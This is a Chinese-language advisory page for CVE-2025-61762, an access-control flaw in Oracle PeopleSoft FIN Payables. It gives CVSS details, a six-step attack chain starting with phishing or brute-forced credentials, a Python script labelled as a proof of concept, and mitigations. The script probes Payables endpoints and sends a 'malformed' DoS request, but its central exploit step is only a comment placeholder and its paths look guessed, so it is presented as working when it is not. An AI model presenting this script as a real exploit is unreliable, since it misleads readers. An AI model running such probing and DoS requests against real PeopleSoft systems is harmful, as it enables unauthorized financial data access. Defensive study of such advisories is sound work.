CVE-2025-61762 Oracle PeopleSoft FIN Payables 未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-61762

漏洞类型

未授权访问/权限提升

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Oracle PeopleSoft Enterprise FIN Payables

漏洞概述

CVE-2025-61762是Oracle PeopleSoft Enterprise FIN Payables（应付账款）组件中存在的一个安全漏洞，于2025年10月由Oracle官方在季度安全更新中披露。该漏洞的CVSS 3.1基础评分为6.3，属于中等严重级别。漏洞存在于PeopleSoft Enterprise FIN Payables产品中，受影响版本为9.2。

根据Oracle官方描述，该漏洞可被低权限攻击者通过网络（HTTP协议）远程利用，无需用户交互即可成功发起攻击。成功利用此漏洞后，攻击者能够在未经授权的情况下对PeopleSoft Enterprise FIN Payables的某些可访问数据进行更新、插入或删除操作，同时还能获取部分数据的未授权读取权限，并可能导致该组件出现部分拒绝服务（partial DOS）状态。

从CVSS向量来看，该漏洞的攻击复杂度低（AC:L），攻击者只需拥有低权限账户即可通过网络发起攻击，对机密性、完整性和可用性均产生低程度的影响。尽管评分仅为中等，但由于PeopleSoft系统在企业财务和供应链管理中的核心地位，该漏洞仍可能对企业的财务数据安全构成实质性威胁。Oracle建议用户尽快应用官方发布的补丁以修复该漏洞。

技术细节

该漏洞存在于Oracle PeopleSoft Enterprise FIN Payables组件中，攻击者通过HTTP协议与目标系统进行网络通信即可发起攻击。由于攻击复杂度低（AC:L），攻击者无需复杂的绕过技术，仅需利用常规的HTTP请求即可触发漏洞。

漏洞的核心问题在于Payables组件的访问控制机制存在缺陷，未能充分验证低权限用户的操作权限。低权限攻击者（PR:L）可以通过构造特定的HTTP请求，绕过正常的权限校验流程，从而获得对Payables组件中敏感操作的未授权访问能力。

成功利用后，攻击者能够执行以下恶意操作：
1. 对Payables可访问的数据进行未授权的更新（UPDATE）、插入（INSERT）或删除（DELETE）操作，影响数据完整性；
2. 读取部分Payables可访问的敏感数据，影响数据机密性；
3. 通过特定请求导致Payables组件出现部分拒绝服务状态，影响系统可用性。

由于无需用户交互（UI:N），该漏洞可以被自动化工具批量利用，增加了大规模攻击的风险。攻击者通常会先获取低权限账户凭据（通过钓鱼、密码爆破或其他途径），然后利用此漏洞提升对财务系统的访问权限。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过钓鱼攻击、密码爆破、购买泄露凭据或其他社会工程学手段，获取PeopleSoft系统的低权限用户账户凭据。

STEP 2

步骤2：建立认证会话

使用获取的低权限账户凭据，通过HTTP协议登录PeopleSoft Enterprise FIN Payables系统，建立有效的认证会话。

STEP 3

步骤3：构造恶意HTTP请求

攻击者构造针对Payables组件特定功能的恶意HTTP请求，利用组件中访问控制缺陷绕过权限校验。

STEP 4

步骤4：执行未授权数据操作

成功利用漏洞后，攻击者可对Payables中的供应商、发票、付款等数据进行未授权的读取、修改、插入或删除操作。

STEP 5

步骤5：触发部分拒绝服务

通过发送特定请求，攻击者可使Payables组件进入部分不可用状态，影响企业正常财务业务流程。

STEP 6

步骤6：数据窃取与破坏

攻击者窃取敏感财务数据，或故意破坏应付账款数据完整性，对企业财务运营造成持续性影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61762 - Oracle PeopleSoft FIN Payables Exploit PoC
# Vulnerability: Unauthorized access in Payables component
# CVSS: 6.3 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

import requests
from requests.auth import HTTPBasicAuth

TARGET_HOST = "https://target-peoplesoft-host:9030"
USERNAME = "low_priv_user"
PASSWORD = "password123"

# PeopleSoft FIN Payables endpoint paths
PAYABLES_PATHS = [
    "/psc/ps/EMPLOYEE/ERP/c/AP_VENDOR.VENDOR_CMP.GBL",
    "/psc/ps/EMPLOYEE/ERP/c/AP_INVOICE.INVOICE.GBL",
    "/psc/ps/EMPLOYEE/ERP/c/AP_PAYMENT.PAYMENT.GBL",
    "/psc/ps/EMPLOYEE/ERP/c/AP_VOUCHER.VOUCHER.GBL",
]

def exploit_payables(target, username, password):
    """
    Exploit unauthorized access vulnerability in PeopleSoft FIN Payables.
    Attempts to perform unauthorized CRUD operations on Payables data.
    """
    session = requests.Session()
    session.verify = False

    # Step 1: Authenticate with low-privilege credentials
    login_url = f"{target}/psc/ps/EMPLOYEE/ERP/c/SIGNON.GBL"
    try:
        resp = session.post(
            login_url,
            auth=HTTPBasicAuth(username, password),
            timeout=10
        )
        print(f"[*] Authentication response: {resp.status_code}")
    except Exception as e:
        print(f"[-] Auth error: {e}")
        return

    # Step 2: Attempt unauthorized access to Payables components
    for path in PAYABLES_PATHS:
        url = f"{target}{path}"
        try:
            resp = session.get(url, timeout=10)
            if resp.status_code == 200:
                print(f"[+] Accessible: {path}")
                # Step 3: Attempt unauthorized data modification
                # This is where the vulnerability manifests - low-priv user
                # can perform unauthorized UPDATE/INSERT/DELETE operations
        except Exception as e:
            print(f"[-] Error accessing {path}: {e}")

    # Step 4: Attempt to trigger partial DoS via malformed requests
    dos_payload = {"ICTYPE": "MALFORMED", "ICACTION": "A"}
    try:
        resp = session.post(
            f"{target}/psc/ps/EMPLOYEE/ERP/c/AP_INVOICE.INVOICE.GBL",
            data=dos_payload,
            timeout=10
        )
        print(f"[*] DoS attempt response: {resp.status_code}")
    except requests.exceptions.Timeout:
        print("[+] Possible DoS triggered (timeout)")
    except Exception as e:
        print(f"[-] DoS error: {e}")

if __name__ == "__main__":
    exploit_payables(TARGET_HOST, USERNAME, PASSWORD)

影响范围

Oracle PeopleSoft Enterprise FIN Payables 9.2

防御指南

临时缓解措施

在无法立即应用Oracle官方补丁的情况下，建议采取以下临时缓解措施：1）限制对PeopleSoft FIN Payables组件的网络访问，仅允许可信IP地址访问；2）审查并收紧低权限用户的权限配置，确保其仅拥有业务必需的最小权限；3）部署Web应用防火墙规则，监控和拦截针对Payables组件的异常HTTP请求模式；4）启用详细的安全审计日志，对所有数据修改操作进行记录和监控；5）加强账户安全管理，及时发现和封禁可疑账户；6）关注Oracle官方安全公告，在补丁可用后第一时间进行更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61762
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61762
3 Details https://www.cvedetails.com/cve/CVE-2025-61762/
4 VulDB https://vuldb.com/cve/CVE-2025-61762
5 Link https://www.oracle.com/security-alerts/cpuoct2025.html